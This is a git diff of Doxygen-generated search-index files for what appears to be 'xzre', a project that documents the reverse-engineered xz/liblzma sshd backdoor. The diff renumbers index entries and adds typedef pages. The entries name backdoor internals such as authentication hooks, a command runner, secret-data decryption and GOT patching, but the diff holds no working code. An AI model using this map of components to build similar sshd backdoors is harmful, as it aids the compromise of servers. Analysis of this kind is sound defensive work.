6c9c61d..f026b52 100644 --- a/search/functions_8.js +++ b/search/functions_8.js @@ -1,8 +1,8 @@ var searchData= [ - ['main_5felf_5fparse_394',['main_elf_parse',['../xzre_8h.html#a642ed90d3ade30228b3286310de5e5c1',1,'xzre.h']]], - ['mm_5fanswer_5fauthpassword_5fhook_395',['mm_answer_authpassword_hook',['../xzre_8h.html#ace15703b7d962e9d6be778e4d8066f79',1,'xzre.h']]], - ['mm_5fanswer_5fkeyallowed_5fhook_396',['mm_answer_keyallowed_hook',['../xzre_8h.html#a8ce260e9315b4afa70668391058ed484',1,'xzre.h']]], - ['mm_5fanswer_5fkeyverify_5fhook_397',['mm_answer_keyverify_hook',['../xzre_8h.html#a99eb76809c798f3bcae98526992e63ef',1,'xzre.h']]], - ['mm_5flog_5fhandler_5fhook_398',['mm_log_handler_hook',['../xzre_8h.html#a096fbb5b183337e44012a38910ea31eb',1,'xzre.h']]] + ['main_5felf_5fparse_400',['main_elf_parse',['../xzre_8h.html#a642ed90d3ade30228b3286310de5e5c1',1,'xzre.h']]], + ['mm_5fanswer_5fauthpassword_5fhook_401',['mm_answer_authpassword_hook',['../xzre_8h.html#ace15703b7d962e9d6be778e4d8066f79',1,'xzre.h']]], + ['mm_5fanswer_5fkeyallowed_5fhook_402',['mm_answer_keyallowed_hook',['../xzre_8h.html#a8ce260e9315b4afa70668391058ed484',1,'xzre.h']]], + ['mm_5fanswer_5fkeyverify_5fhook_403',['mm_answer_keyverify_hook',['../xzre_8h.html#a99eb76809c798f3bcae98526992e63ef',1,'xzre.h']]], + ['mm_5flog_5fhandler_5fhook_404',['mm_log_handler_hook',['../xzre_8h.html#a096fbb5b183337e44012a38910ea31eb',1,'xzre.h']]] ]; diff --git a/search/functions_9.js b/search/functions_9.js index a2222e8..1547912 100644 --- a/search/functions_9.js +++ b/search/functions_9.js @@ -1,6 +1,6 @@ var searchData= [ - ['process_5fis_5fsshd_399',['process_is_sshd',['../xzre_8h.html#a04a9f7dfab9ccac6d8407c906b7b2e2e',1,'xzre.h']]], - ['process_5fshared_5flibraries_400',['process_shared_libraries',['../xzre_8h.html#a1cb8bb283baa56567d7b88b5fcfe7db7',1,'xzre.h']]], - ['process_5fshared_5flibraries_5fmap_401',['process_shared_libraries_map',['../xzre_8h.html#a1fcba1b3d069ccf76ee3cef4a3b9a682',1,'xzre.h']]] + ['process_5fis_5fsshd_405',['process_is_sshd',['../xzre_8h.html#a04a9f7dfab9ccac6d8407c906b7b2e2e',1,'xzre.h']]], + ['process_5fshared_5flibraries_406',['process_shared_libraries',['../xzre_8h.html#a1cb8bb283baa56567d7b88b5fcfe7db7',1,'xzre.h']]], + ['process_5fshared_5flibraries_5fmap_407',['process_shared_libraries_map',['../xzre_8h.html#a1fcba1b3d069ccf76ee3cef4a3b9a682',1,'xzre.h']]] ]; diff --git a/search/functions_a.js b/search/functions_a.js index 6f4f591..41d77b8 100644 --- a/search/functions_a.js +++ b/search/functions_a.js @@ -1,7 +1,7 @@ var searchData= [ - ['resolve_5flibc_5fimports_402',['resolve_libc_imports',['../xzre_8h.html#a0d70747b6216270de07c783fc499938e',1,'xzre.h']]], - ['rsa_5fkey_5fhash_403',['rsa_key_hash',['../xzre_8h.html#a642b0366b943daba60d004a6a46fb7c7',1,'xzre.h']]], - ['rsa_5fpublic_5fdecrypt_404',['RSA_public_decrypt',['../ssh__patch_8c.html#ae142ad01d213393458d1f4770b68555f',1,'ssh_patch.c']]], - ['run_5fbackdoor_5fcommands_405',['run_backdoor_commands',['../xzre_8h.html#add930f2364d6ac0711ec484781f00f03',1,'xzre.h']]] + ['resolve_5flibc_5fimports_408',['resolve_libc_imports',['../xzre_8h.html#a0d70747b6216270de07c783fc499938e',1,'xzre.h']]], + ['rsa_5fkey_5fhash_409',['rsa_key_hash',['../xzre_8h.html#a642b0366b943daba60d004a6a46fb7c7',1,'xzre.h']]], + ['rsa_5fpublic_5fdecrypt_410',['RSA_public_decrypt',['../ssh__patch_8c.html#ae142ad01d213393458d1f4770b68555f',1,'ssh_patch.c']]], + ['run_5fbackdoor_5fcommands_411',['run_backdoor_commands',['../xzre_8h.html#add930f2364d6ac0711ec484781f00f03',1,'xzre.h']]] ]; diff --git a/search/functions_b.js b/search/functions_b.js index eeb8f60..be9afda 100644 --- a/search/functions_b.js +++ b/search/functions_b.js @@ -1,27 +1,27 @@ var searchData= [ - ['secret_5fdata_5fappend_5ffrom_5faddress_406',['secret_data_append_from_address',['../xzre_8h.html#aa7239c834d2598747c9158949280783b',1,'xzre.h']]], - ['secret_5fdata_5fappend_5ffrom_5fcall_5fsite_407',['secret_data_append_from_call_site',['../xzre_8h.html#ace528f88c27d645eafff5052f6c36bd0',1,'xzre.h']]], - ['secret_5fdata_5fappend_5ffrom_5fcode_408',['secret_data_append_from_code',['../xzre_8h.html#ad595372eac746eb11ddc536e5a20d667',1,'xzre.h']]], - ['secret_5fdata_5fappend_5fitem_409',['secret_data_append_item',['../xzre_8h.html#a2e827c4d8e3500f106150e786053dde2',1,'xzre.h']]], - ['secret_5fdata_5fappend_5fitems_410',['secret_data_append_items',['../xzre_8h.html#aa80510b3b8c22dc0ccf6e123c393fb3d',1,'xzre.h']]], - ['secret_5fdata_5fappend_5fsingleton_411',['secret_data_append_singleton',['../xzre_8h.html#a48636f910a9c7df2f2adfa4abf7a73e9',1,'xzre.h']]], - ['secret_5fdata_5fget_5fdecrypted_412',['secret_data_get_decrypted',['../xzre_8h.html#a80592f231ad06e5a8ba204e6ff685827',1,'xzre.h']]], - ['sha256_413',['sha256',['../xzre_8h.html#a3a3417b7999e13c79b9411e092923278',1,'xzre.h']]], - ['sshbuf_5fbignum_5fis_5fnegative_414',['sshbuf_bignum_is_negative',['../xzre_8h.html#ae4488f858b97dc690b41cf9a5d20ef44',1,'xzre.h']]], - ['sshd_5ffind_5fmonitor_5fstruct_415',['sshd_find_monitor_struct',['../xzre_8h.html#ad32fc521229739df889407c2e9e48475',1,'xzre.h']]], - ['sshd_5ffind_5fsensitive_5fdata_416',['sshd_find_sensitive_data',['../xzre_8h.html#a5f865a1a2eb6a32980c4336b2290e17e',1,'xzre.h']]], - ['sshd_5fget_5fclient_5fsocket_417',['sshd_get_client_socket',['../xzre_8h.html#aaa520bbc6de39ccb7a4e5013cf66d7aa',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5faddress_5fvia_5fkrb5ccname_418',['sshd_get_sensitive_data_address_via_krb5ccname',['../xzre_8h.html#a75dff765c216d52b153ba98cf7cf0227',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5faddress_5fvia_5fxcalloc_419',['sshd_get_sensitive_data_address_via_xcalloc',['../xzre_8h.html#ae0bd1e83c94cd866e022dd5867bee152',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5fscore_420',['sshd_get_sensitive_data_score',['../xzre_8h.html#a7d1ef087d8cb5ea0a468fc42bb503049',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fdemote_5fsensitive_5fdata_421',['sshd_get_sensitive_data_score_in_demote_sensitive_data',['../xzre_8h.html#a8320540fc87f4c785714c52940a85571',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fdo_5fchild_422',['sshd_get_sensitive_data_score_in_do_child',['../xzre_8h.html#a5f78359c3bb3564a965009ee2280ac5a',1,'xzre.h']]], - ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fmain_423',['sshd_get_sensitive_data_score_in_main',['../xzre_8h.html#aa83cef3858c167b051721db9fbd72667',1,'xzre.h']]], - ['sshd_5fget_5fsshbuf_424',['sshd_get_sshbuf',['../xzre_8h.html#a44abb1c444c5d0428c6d67b9e8e38276',1,'xzre.h']]], - ['sshd_5fget_5fusable_5fsocket_425',['sshd_get_usable_socket',['../xzre_8h.html#a077a435ef7c8a7960451ff5c0cc5dc43',1,'xzre.h']]], - ['sshd_5fkex_5fsshbuf_5fget_426',['sshd_kex_sshbuf_get',['../xzre_8h.html#a657f411379e9d088996d8722b82eeefd',1,'xzre.h']]], - ['sshd_5flog_427',['sshd_log',['../xzre_8h.html#adbd2f206ddcca1e6919558e0548990d7',1,'xzre.h']]], - ['sshd_5fpatch_5fvariables_428',['sshd_patch_variables',['../xzre_8h.html#a938289ac36ce7b17b60a4f5c0c28d2d4',1,'xzre.h']]], - ['sshd_5fproxy_5felevate_429',['sshd_proxy_elevate',['../xzre_8h.html#a68b586c330a6c746c65cee778a8b72e8',1,'xzre.h']]] + ['secret_5fdata_5fappend_5ffrom_5faddress_412',['secret_data_append_from_address',['../xzre_8h.html#aa7239c834d2598747c9158949280783b',1,'xzre.h']]], + ['secret_5fdata_5fappend_5ffrom_5fcall_5fsite_413',['secret_data_append_from_call_site',['../xzre_8h.html#ace528f88c27d645eafff5052f6c36bd0',1,'xzre.h']]], + ['secret_5fdata_5fappend_5ffrom_5fcode_414',['secret_data_append_from_code',['../xzre_8h.html#ad595372eac746eb11ddc536e5a20d667',1,'xzre.h']]], + ['secret_5fdata_5fappend_5fitem_415',['secret_data_append_item',['../xzre_8h.html#a2e827c4d8e3500f106150e786053dde2',1,'xzre.h']]], + ['secret_5fdata_5fappend_5fitems_416',['secret_data_append_items',['../xzre_8h.html#aa80510b3b8c22dc0ccf6e123c393fb3d',1,'xzre.h']]], + ['secret_5fdata_5fappend_5fsingleton_417',['secret_data_append_singleton',['../xzre_8h.html#a48636f910a9c7df2f2adfa4abf7a73e9',1,'xzre.h']]], + ['secret_5fdata_5fget_5fdecrypted_418',['secret_data_get_decrypted',['../xzre_8h.html#a80592f231ad06e5a8ba204e6ff685827',1,'xzre.h']]], + ['sha256_419',['sha256',['../xzre_8h.html#a3a3417b7999e13c79b9411e092923278',1,'xzre.h']]], + ['sshbuf_5fbignum_5fis_5fnegative_420',['sshbuf_bignum_is_negative',['../xzre_8h.html#ae4488f858b97dc690b41cf9a5d20ef44',1,'xzre.h']]], + ['sshd_5ffind_5fmonitor_5fstruct_421',['sshd_find_monitor_struct',['../xzre_8h.html#ad32fc521229739df889407c2e9e48475',1,'xzre.h']]], + ['sshd_5ffind_5fsensitive_5fdata_422',['sshd_find_sensitive_data',['../xzre_8h.html#a5f865a1a2eb6a32980c4336b2290e17e',1,'xzre.h']]], + ['sshd_5fget_5fclient_5fsocket_423',['sshd_get_client_socket',['../xzre_8h.html#aaa520bbc6de39ccb7a4e5013cf66d7aa',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5faddress_5fvia_5fkrb5ccname_424',['sshd_get_sensitive_data_address_via_krb5ccname',['../xzre_8h.html#a75dff765c216d52b153ba98cf7cf0227',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5faddress_5fvia_5fxcalloc_425',['sshd_get_sensitive_data_address_via_xcalloc',['../xzre_8h.html#ae0bd1e83c94cd866e022dd5867bee152',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5fscore_426',['sshd_get_sensitive_data_score',['../xzre_8h.html#a7d1ef087d8cb5ea0a468fc42bb503049',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fdemote_5fsensitive_5fdata_427',['sshd_get_sensitive_data_score_in_demote_sensitive_data',['../xzre_8h.html#a8320540fc87f4c785714c52940a85571',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fdo_5fchild_428',['sshd_get_sensitive_data_score_in_do_child',['../xzre_8h.html#a5f78359c3bb3564a965009ee2280ac5a',1,'xzre.h']]], + ['sshd_5fget_5fsensitive_5fdata_5fscore_5fin_5fmain_429',['sshd_get_sensitive_data_score_in_main',['../xzre_8h.html#aa83cef3858c167b051721db9fbd72667',1,'xzre.h']]], + ['sshd_5fget_5fsshbuf_430',['sshd_get_sshbuf',['../xzre_8h.html#a44abb1c444c5d0428c6d67b9e8e38276',1,'xzre.h']]], + ['sshd_5fget_5fusable_5fsocket_431',['sshd_get_usable_socket',['../xzre_8h.html#a077a435ef7c8a7960451ff5c0cc5dc43',1,'xzre.h']]], + ['sshd_5fkex_5fsshbuf_5fget_432',['sshd_kex_sshbuf_get',['../xzre_8h.html#a657f411379e9d088996d8722b82eeefd',1,'xzre.h']]], + ['sshd_5flog_433',['sshd_log',['../xzre_8h.html#adbd2f206ddcca1e6919558e0548990d7',1,'xzre.h']]], + ['sshd_5fpatch_5fvariables_434',['sshd_patch_variables',['../xzre_8h.html#a938289ac36ce7b17b60a4f5c0c28d2d4',1,'xzre.h']]], + ['sshd_5fproxy_5felevate_435',['sshd_proxy_elevate',['../xzre_8h.html#a60b93ed64ba904012e9fa9477e97a244',1,'xzre.h']]] ]; diff --git a/search/functions_c.js b/search/functions_c.js index 9b98f00..60c987a 100644 --- a/search/functions_c.js +++ b/search/functions_c.js @@ -1,4 +1,4 @@ var searchData= [ - ['update_5fgot_5faddress_430',['update_got_address',['../xzre_8h.html#ad3a61f27a1663eb3e0b25b861c85fe3c',1,'xzre.h']]] + ['update_5fgot_5faddress_436',['update_got_address',['../xzre_8h.html#ad3a61f27a1663eb3e0b25b861c85fe3c',1,'xzre.h']]] ]; diff --git a/search/functions_d.js b/search/functions_d.js index e1876e5..42ed56f 100644 --- a/search/functions_d.js +++ b/search/functions_d.js @@ -1,4 +1,4 @@ var searchData= [ - ['verify_5fsignature_431',['verify_signature',['../xzre_8h.html#a0b0ce96673cd8ebf4541cff2b20dfe86',1,'xzre.h']]] + ['verify_5fsignature_437',['verify_signature',['../xzre_8h.html#a0b0ce96673cd8ebf4541cff2b20dfe86',1,'xzre.h']]] ]; diff --git a/search/functions_e.js b/search/functions_e.js index c32e63c..43b11ad 100644 --- a/search/functions_e.js +++ b/search/functions_e.js @@ -1,4 +1,4 @@ var searchData= [ - ['x86_5fdasm_432',['x86_dasm',['../xzre_8h.html#a6ad15241561f71f06020fb6f2649e6a3',1,'xzre.h']]] + ['x86_5fdasm_438',['x86_dasm',['../xzre_8h.html#a6ad15241561f71f06020fb6f2649e6a3',1,'xzre.h']]] ]; diff --git a/search/pages_0.js b/search/pages_0.js index bc95445..3505f82 100644 --- a/search/pages_0.js +++ b/search/pages_0.js @@ -1,4 +1,4 @@ var searchData= [ - ['xzre_562',['xzre',['../md_README.html',1,'']]] + ['xzre_570',['xzre',['../md_README.html',1,'']]] ]; diff --git a/search/searchdata.js b/search/searchdata.js index b0b8605..d7ef9eb 100644 --- a/search/searchdata.js +++ b/search/searchdata.js @@ -1,11 +1,11 @@ var indexSectionsWithContent = { 0: "_abcdefghiklmnoprstuvx", - 1: "abcdefgiklmsu", + 1: "abcdefgiklmprsu", 2: "sx", 3: "_bcdefgimprsuvx", 4: "_bcdefghilmnoprstvx", - 5: "begk", + 5: "begkmpr", 6: "ce", 7: "cx", 8: "x" diff --git a/search/typedefs_0.js b/search/typedefs_0.js index 3a540dd..7a44627 100644 --- a/search/typedefs_0.js +++ b/search/typedefs_0.js @@ -1,5 +1,5 @@ var searchData= [ - ['backdoor_5fdata_5fhandle_5ft_539',['backdoor_data_handle_t',['../xzre_8h.html#a98d97fcc51fcd4fdbc88e9cd1f0d4405',1,'xzre.h']]], - ['backdoor_5fdata_5ft_540',['backdoor_data_t',['../xzre_8h.html#a78a513f8570845832aaf68c928a5126a',1,'xzre.h']]] + ['backdoor_5fdata_5fhandle_5ft_544',['backdoor_data_handle_t',['../xzre_8h.html#a98d97fcc51fcd4fdbc88e9cd1f0d4405',1,'xzre.h']]], + ['backdoor_5fdata_5ft_545',['backdoor_data_t',['../xzre_8h.html#a78a513f8570845832aaf68c928a5126a',1,'xzre.h']]] ]; diff --git a/search/typedefs_1.js b/search/typedefs_1.js index 8c4c3bf..5ca0442 100644 --- a/search/typedefs_1.js +++ b/search/typedefs_1.js @@ -1,4 +1,4 @@ var searchData= [ - ['elf_5fhandles_5ft_541',['elf_handles_t',['../xzre_8h.html#a65ea88969746c06d6c0d0b1586f610db',1,'xzre.h']]] + ['elf_5fhandles_5ft_546',['elf_handles_t',['../xzre_8h.html#a65ea88969746c06d6c0d0b1586f610db',1,'xzre.h']]] ]; diff --git a/search/typedefs_2.js b/search/typedefs_2.js index bad1abc..c14f427 100644 --- a/search/typedefs_2.js +++ b/search/typedefs_2.js @@ -1,4 +1,4 @@ var searchData= [ - ['gnu_5fhash_5ftable_5ft_542',['gnu_hash_table_t',['../xzre_8h.html#a14e14daa7c876bbbe0dc552f840494f8',1,'xzre.h']]] + ['gnu_5fhash_5ftable_5ft_547',['gnu_hash_table_t',['../xzre_8h.html#a14e14daa7c876bbbe0dc552f840494f8',1,'xzre.h']]] ]; diff --git a/search/typedefs_3.js b/search/typedefs_3.js index 883fd45..1994174 100644 --- a/search/typedefs_3.js +++ b/search/typedefs_3.js @@ -1,5 +1,5 @@ var searchData= [ - ['key_5fpayload_5fhdr_5ft_543',['key_payload_hdr_t',['../xzre_8h.html#a41b1410a6c3d2613895ce26896903600',1,'xzre.h']]], - ['key_5fpayload_5ft_544',['key_payload_t',['../xzre_8h.html#aaad9381e8f52552bbb914465c45bdac2',1,'xzre.h']]] + ['key_5fpayload_5fhdr_5ft_548',['key_payload_hdr_t',['../xzre_8h.html#a41b1410a6c3d2613895ce26896903600',1,'xzre.h']]], + ['key_5fpayload_5ft_549',['key_payload_t',['../xzre_8h.html#aaad9381e8f52552bbb914465c45bdac2',1,'xzre.h']]] ]; diff --git a/search/typedefs_4.html b/search/typedefs_4.html new file mode 100644 index 0000000..81466a5 --- /dev/null +++ b/search/typedefs_4.html @@ -0,0 +1,37 @@ + + + + + + + + + + +
+
Loading...
+
+ +
Searching...
+
No Matches
+ +
+ + diff --git a/search/typedefs_4.js b/search/typedefs_4.js new file mode 100644 index 0000000..8dbe738 --- /dev/null +++ b/search/typedefs_4.js @@ -0,0 +1,4 @@ +var searchData= +[ + ['monitor_5fdata_5ft_550',['monitor_data_t',['../xzre_8h.html#ac0c8a0430fa3d00804d08b800bfdfc5d',1,'xzre.h']]] +]; diff --git a/search/typedefs_5.html b/search/typedefs_5.html new file mode 100644 index 0000000..43fbec1 --- /dev/null +++ b/search/typedefs_5.html @@ -0,0 +1,37 @@ + + + + + + + + + + +
+
Loading...
+
+ +
Searching...
+
No Matches
+ +
+ + diff --git a/search/typedefs_5.js b/search/typedefs_5.js new file mode 100644 index 0000000..a1c4435 --- /dev/null +++ b/search/typedefs_5.js @@ -0,0 +1,4 @@ +var searchData= +[ + ['payload_5ft_551',['payload_t',['../xzre_8h.html#ab2f751be0f46ca021f9e36eed65c8705',1,'xzre.h']]] +]; diff --git a/search/typedefs_6.html b/search/typedefs_6.html new file mode 100644 index 0000000..99479c2 --- /dev/null +++ b/search/typedefs_6.html @@ -0,0 +1,37 @@ + + + + + + + + + + +
+
Loading...
+
+ +
Searching...
+
No Matches
+ +
+ + diff --git a/search/typedefs_6.js b/search/typedefs_6.js new file mode 100644 index 0000000..8f296df --- /dev/null +++ b/search/typedefs_6.js @@ -0,0 +1,4 @@ +var searchData= +[ + ['run_5fbackdoor_5fcommands_5fdata_5ft_552',['run_backdoor_commands_data_t',['../xzre_8h.html#aa5a220a495d161205ee770f8e7b360d5',1,'xzre.h']]] +]; diff --git a/search/variables_0.js b/search/variables_0.js index 621983a..675c3d8 100644 --- a/search/variables_0.js +++ b/search/variables_0.js @@ -1,7 +1,7 @@ var searchData= [ - ['_5fdl_5faudit_5fptr_433',['_dl_audit_ptr',['../structldso__ctx.html#acef3e145d925ae4a507d61e4c2256809',1,'ldso_ctx']]], - ['_5fdl_5faudit_5fsymbind_5falt_434',['_dl_audit_symbind_alt',['../structldso__ctx.html#ab398b3a2a4a7049a007c2ce246be3e11',1,'ldso_ctx']]], - ['_5fdl_5faudit_5fsymbind_5falt_5f_5fsize_435',['_dl_audit_symbind_alt__size',['../structldso__ctx.html#aa517322ded43614b595e507c1425eabb',1,'ldso_ctx']]], - ['_5fdl_5fnaudit_5fptr_436',['_dl_naudit_ptr',['../structldso__ctx.html#a67f22bd8ad4f38fd85f4be1558df5adc',1,'ldso_ctx']]] + ['_5fdl_5faudit_5fptr_439',['_dl_audit_ptr',['../structldso__ctx.html#acef3e145d925ae4a507d61e4c2256809',1,'ldso_ctx']]], + ['_5fdl_5faudit_5fsymbind_5falt_440',['_dl_audit_symbind_alt',['../structldso__ctx.html#ab398b3a2a4a7049a007c2ce246be3e11',1,'ldso_ctx']]], + ['_5fdl_5faudit_5fsymbind_5falt_5f_5fsize_441',['_dl_audit_symbind_alt__size',['../structldso__ctx.html#aa517322ded43614b595e507c1425eabb',1,'ldso_ctx']]], + ['_5fdl_5fnaudit_5fptr_442',['_dl_naudit_ptr',['../structldso__ctx.html#a67f22bd8ad4f38fd85f4be1558df5adc',1,'ldso_ctx']]] ]; diff --git a/search/variables_1.js b/search/variables_1.js index 42581e5..caa8d6c 100644 --- a/search/variables_1.js +++ b/search/variables_1.js @@ -1,7 +1,7 @@ var searchData= [ - ['backdoor_5finit_5fstage2_5fgot_5foffset_437',['backdoor_init_stage2_got_offset',['../structbackdoor__cpuid__reloc__consts.html#a1e485c91ec545face6eb5870af71c3de',1,'backdoor_cpuid_reloc_consts']]], - ['bit_5findex_438',['bit_index',['../unionsecret__data__shift__cursor__t.html#afa0821d36c89dc0e8ac3d126049e1604',1,'secret_data_shift_cursor_t']]], - ['buffer_439',['buffer',['../structlzma__check__state.html#a6e2d968df74b41b8f72a7f01f5c590e0',1,'lzma_check_state']]], - ['byte_5findex_440',['byte_index',['../unionsecret__data__shift__cursor__t.html#a1aaf16a99b291ced145bbbaaef9cba1e',1,'secret_data_shift_cursor_t']]] + ['backdoor_5finit_5fstage2_5fgot_5foffset_443',['backdoor_init_stage2_got_offset',['../structbackdoor__cpuid__reloc__consts.html#a1e485c91ec545face6eb5870af71c3de',1,'backdoor_cpuid_reloc_consts']]], + ['bit_5findex_444',['bit_index',['../unionsecret__data__shift__cursor__t.html#afa0821d36c89dc0e8ac3d126049e1604',1,'secret_data_shift_cursor_t']]], + ['buffer_445',['buffer',['../structlzma__check__state.html#a6e2d968df74b41b8f72a7f01f5c590e0',1,'lzma_check_state']]], + ['byte_5findex_446',['byte_index',['../unionsecret__data__shift__cursor__t.html#a1aaf16a99b291ced145bbbaaef9cba1e',1,'secret_data_shift_cursor_t']]] ]; diff --git a/search/variables_10.js b/search/variables_10.js index 9073ac6..39a0a0a 100644 --- a/search/variables_10.js +++ b/search/variables_10.js @@ -1,7 +1,7 @@ var searchData= [ - ['tls_5fget_5faddr_5fplt_5foffset_532',['tls_get_addr_plt_offset',['../structbackdoor__tls__get__addr__reloc__consts.html#a0827b12f5648dae1daaa202813b299e6',1,'backdoor_tls_get_addr_reloc_consts']]], - ['tls_5fget_5faddr_5frandom_5fsymbol_533',['tls_get_addr_random_symbol',['../xzre_8h.html#a3101b150fe0226a632314e2fa473aba1',1,'xzre.h']]], - ['tls_5fget_5faddr_5frandom_5fsymbol_5fgot_5foffset_534',['tls_get_addr_random_symbol_got_offset',['../structbackdoor__tls__get__addr__reloc__consts.html#a22cf3898da642626d8fc88d1c4b5bb39',1,'backdoor_tls_get_addr_reloc_consts']]], - ['tls_5fget_5faddr_5freloc_5fconsts_535',['tls_get_addr_reloc_consts',['../xzre_8h.html#aadd306e1b2b33d0306f1995e0a83dae7',1,'xzre.h']]] + ['tls_5fget_5faddr_5fplt_5foffset_537',['tls_get_addr_plt_offset',['../structbackdoor__tls__get__addr__reloc__consts.html#a0827b12f5648dae1daaa202813b299e6',1,'backdoor_tls_get_addr_reloc_consts']]], + ['tls_5fget_5faddr_5frandom_5fsymbol_538',['tls_get_addr_random_symbol',['../xzre_8h.html#a3101b150fe0226a632314e2fa473aba1',1,'xzre.h']]], + ['tls_5fget_5faddr_5frandom_5fsymbol_5fgot_5foffset_539',['tls_get_addr_random_symbol_got_offset',['../structbackdoor__tls__get__addr__reloc__consts.html#a22cf3898da642626d8fc88d1c4b5bb39',1,'backdoor_tls_get_addr_reloc_consts']]], + ['tls_5fget_5faddr_5freloc_5fconsts_540',['tls_get_addr_reloc_consts',['../xzre_8h.html#aadd306e1b2b33d0306f1995e0a83dae7',1,'xzre.h']]] ]; diff --git a/search/variables_11.js b/search/variables_11.js index 2c299ed..4e95685 100644 --- a/search/variables_11.js +++ b/search/variables_11.js @@ -1,5 +1,5 @@ var searchData= [ - ['verdef_536',['verdef',['../structelf__info.html#a356ae81a037a0f79bac22d7064642ef3',1,'elf_info']]], - ['verdef_5fnum_537',['verdef_num',['../structelf__info.html#a74c23ee5c941369c805fc6a58b01e362',1,'elf_info']]] + ['verdef_541',['verdef',['../structelf__info.html#a356ae81a037a0f79bac22d7064642ef3',1,'elf_info']]], + ['verdef_5fnum_542',['verdef_num',['../structelf__info.html#a74c23ee5c941369c805fc6a58b01e362',1,'elf_info']]] ]; diff --git a/search/variables_12.js b/search/variables_12.js index 0accba9..471a648 100644 --- a/search/variables_12.js +++ b/search/variables_12.js @@ -1,4 +1,4 @@ var searchData= [ - ['xref_538',['xref',['../structstring__item.html#a897d41bd473c1ffd8e65448e28f05f70',1,'string_item']]] + ['xref_543',['xref',['../structstring__item.html#a897d41bd473c1ffd8e65448e28f05f70',1,'string_item']]] ]; diff --git a/search/variables_2.js b/search/variables_2.js index dcbda76..6d063fc 100644 --- a/search/variables_2.js +++ b/search/variables_2.js @@ -1,10 +1,10 @@ var searchData= [ - ['code_5fsegment_5fsize_441',['code_segment_size',['../structelf__info.html#a01041699b43bde54280aa03f2e8b52a0',1,'elf_info']]], - ['code_5fsegment_5fstart_442',['code_segment_start',['../structelf__info.html#a6caeca689d53da9142b735070a008df8',1,'elf_info']]], - ['cpuid_5ffn_443',['cpuid_fn',['../structgot__ctx.html#a556b4a0fdc51a1ad94d8fd5dcacc441e',1,'got_ctx']]], - ['cpuid_5fgot_5findex_444',['cpuid_got_index',['../structbackdoor__cpuid__reloc__consts.html#abbb5ea58df69e2a4ef744eac7e9094c2',1,'backdoor_cpuid_reloc_consts']]], - ['cpuid_5frandom_5fsymbol_445',['cpuid_random_symbol',['../xzre_8h.html#ac7d6a45076bf21904bac3163ae57090e',1,'xzre.h']]], - ['cpuid_5frandom_5fsymbol_5fgot_5foffset_446',['cpuid_random_symbol_got_offset',['../structbackdoor__cpuid__reloc__consts.html#a690a66d314ca79c17c8654b5a7cfe5ff',1,'backdoor_cpuid_reloc_consts']]], - ['cpuid_5freloc_5fconsts_447',['cpuid_reloc_consts',['../xzre_8h.html#a6ee0871d6d6f7544176777c8f00244b7',1,'xzre.h']]] + ['code_5fsegment_5fsize_447',['code_segment_size',['../structelf__info.html#a01041699b43bde54280aa03f2e8b52a0',1,'elf_info']]], + ['code_5fsegment_5fstart_448',['code_segment_start',['../structelf__info.html#a6caeca689d53da9142b735070a008df8',1,'elf_info']]], + ['cpuid_5ffn_449',['cpuid_fn',['../structgot__ctx.html#a556b4a0fdc51a1ad94d8fd5dcacc441e',1,'got_ctx']]], + ['cpuid_5fgot_5findex_450',['cpuid_got_index',['../structbackdoor__cpuid__reloc__consts.html#abbb5ea58df69e2a4ef744eac7e9094c2',1,'backdoor_cpuid_reloc_consts']]], + ['cpuid_5frandom_5fsymbol_451',['cpuid_random_symbol',['../xzre_8h.html#ac7d6a45076bf21904bac3163ae57090e',1,'xzre.h']]], + ['cpuid_5frandom_5fsymbol_5fgot_5foffset_452',['cpuid_random_symbol_got_offset',['../structbackdoor__cpuid__reloc__consts.html#a690a66d314ca79c17c8654b5a7cfe5ff',1,'backdoor_cpuid_reloc_consts']]], + ['cpuid_5freloc_5fconsts_453',['cpuid_reloc_consts',['../xzre_8h.html#a6ee0871d6d6f7544176777c8f00244b7',1,'xzre.h']]] ]; diff --git a/search/variables_3.js b/search/variables_3.js index 8cf407b..971c5a4 100644 --- a/search/variables_3.js +++ b/search/variables_3.js @@ -1,10 +1,9 @@ var searchData= [ - ['decrypted_5fsecret_5fdata_448',['decrypted_secret_data',['../structkey__ctx.html#a513b4c31ec1dbf7865acd503325ff11b',1,'key_ctx']]], - ['disable_5fbackdoor_449',['disable_backdoor',['../structglobal__context.html#a4cd62af07344d65195f10f6d6a3c98af',1,'global_context']]], - ['dyn_450',['dyn',['../structelf__info.html#a3c3f1487932a753b2908a26ebb52e0c0',1,'elf_info']]], - ['dyn_5fnum_5fentries_451',['dyn_num_entries',['../structelf__info.html#aad068cf90f065cfa166ee1bfaf56432e',1,'elf_info']]], - ['dynamic_5flinker_452',['dynamic_linker',['../structelf__handles.html#aad9c46086d39b765eb2455b6445f2986',1,'elf_handles']]], - ['dynamic_5flinker_5finfo_453',['dynamic_linker_info',['../structbackdoor__data.html#ad416055b3c186bdc2c86b01a27251f48',1,'backdoor_data']]], - ['dynamic_5flinker_5fmap_454',['dynamic_linker_map',['../structbackdoor__data.html#af0c12a5d305514c457e8ccd17a9634d1',1,'backdoor_data']]] + ['disable_5fbackdoor_454',['disable_backdoor',['../structglobal__context.html#a4cd62af07344d65195f10f6d6a3c98af',1,'global_context']]], + ['dyn_455',['dyn',['../structelf__info.html#a3c3f1487932a753b2908a26ebb52e0c0',1,'elf_info']]], + ['dyn_5fnum_5fentries_456',['dyn_num_entries',['../structelf__info.html#aad068cf90f065cfa166ee1bfaf56432e',1,'elf_info']]], + ['dynamic_5flinker_457',['dynamic_linker',['../structelf__handles.html#aad9c46086d39b765eb2455b6445f2986',1,'elf_handles']]], + ['dynamic_5flinker_5finfo_458',['dynamic_linker_info',['../structbackdoor__data.html#ad416055b3c186bdc2c86b01a27251f48',1,'backdoor_data']]], + 